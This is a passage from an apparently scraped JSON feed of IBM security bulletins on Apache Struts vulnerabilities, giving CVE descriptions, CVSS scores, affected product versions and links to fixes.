crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. 
\nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix 
IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:22", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerability\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", 
"id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:56", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-30T09:48:20", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: **FlashSystem 840 MTM 9840-AE1, and FlashSystem V840 MTMs 9846-AE1 and 9848-AE1 use the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. 
An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. 
\n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem 840 including machine type models (all available code levels) _ \n9840-AE1 \n \n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AE1 & 9848-AE1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**840 MTM: ** \n9840-AE1 \n \n**V840 MTMs:** 9846-AE1 & \n9848-AE1| _A code fix is now available, the VRMF of this code level is 1.1.2.2 (or later)_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem 840 and V840 product model number AE1 nodes are affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-02-18T01:45:50", "id": "1029DD6F473AD662889F3629D432E043E9F3053CFAFEA7698ACCBEF97F9ED67E", "href": "https://www.ibm.com/support/pages/node/689945", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T21:35:11", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability 
Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: **FlashSystem V840 model number -AC0, and \u2013AC1 nodes use the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. 
\n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AC0, 9848-AC0, 9846-AC1, & 9848-AC1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n9846-AC0, \n9846-AC1, \n9848-AC0, \n9848-AC1| _A code fix is now available, the VRMF of this code level is 7.3.0.4 (or later)_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2018-06-18T00:08:33", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem V840 product model numbers AC0 and AC1 nodes are affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-06-18T00:08:33", "id": "4C0DBF63A15F96E4F2164C15299BAC4C8BB35F5DA0A29941D47EAB5DD8E7F12A", "href": "https://www.ibm.com/support/pages/node/689947", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T21:35:12", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in Apache\u2019s Struts library\n\n## Vulnerability Details\n\n**CVE-ID: **CVE-2014-0112, CVE-2014-0094, & CVE-2014-0050 \n\n**DESCRIPTION: 
**FlashSystem V840-AE1 uses the Apache Struts library. Struts is used only by the Service Assist GUI. \n\n_CVE-2014-0112_ (Apache Struts ParametersInterceptor code execution)\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.\n\nCVSS v2 Base Score: **7.5** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92740> \nCVSS Vector: (AV:N/AC:L/AU:N/C:P/I:P/A:P)\n\n_CVE-2014-0094_\n\nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.\n\nCVSS v2 Base Score: **5.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/92205> \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:P/A:N)\n\n_CVE-2014-0050_\n\nApache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests. By sending a specially-crafted request, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. 
\n\nCVSS v2 Base Score: **4.0** \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90987> \nCVSS Vector: (AV:N/AC:H/AU:N/C:P/I:P/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AE1 & 9848-AE1\n\n## Remediation/Fixes\n\n_Products_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n9846-AE1, \n9848-AE1,| _A code fix is now available, the VRMF of this code level is 1.1.2.2_| _N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {}, "published": "2018-06-18T00:08:27", "type": "ibm", "title": "Security Bulletin: The IBM V840 product model number AE1 node is affected by vulnerabilities in Apache\u2019s Struts library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-06-18T00:08:27", "id": "5286AF354DA84BB562B116A3416B9C765F3ED708765C101691CABFF974122A28", "href": "https://www.ibm.com/support/pages/node/689885", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:53:37", "description": "## Summary\n\nStruts vulnerabilities affect IBM InfoSphere Information Server. 
IBM InfoSphere Information Server has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4430_](<https://vulners.com/cve/CVE-2016-4430>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed expression to bypass token validation. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114185_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114185>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-4431_](<https://vulners.com/cve/CVE-2016-4431>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the default action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114187_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114187>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4433_](<https://vulners.com/cve/CVE-2016-4433>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the Getter as action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. 
\nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114186_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114186>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4436_](<https://vulners.com/cve/CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error in Apache Struts related to the method used to clean up the action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4438_](<https://vulners.com/cve/CVE-2016-4438>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system. By passing a malicious expression when using the REST Plugin, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114184_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114184>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-4465_](<https://vulners.com/cve/CVE-2016-4465>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an error when using a built-in URLValidator. An attacker could exploit this vulnerability to overload the server process. 
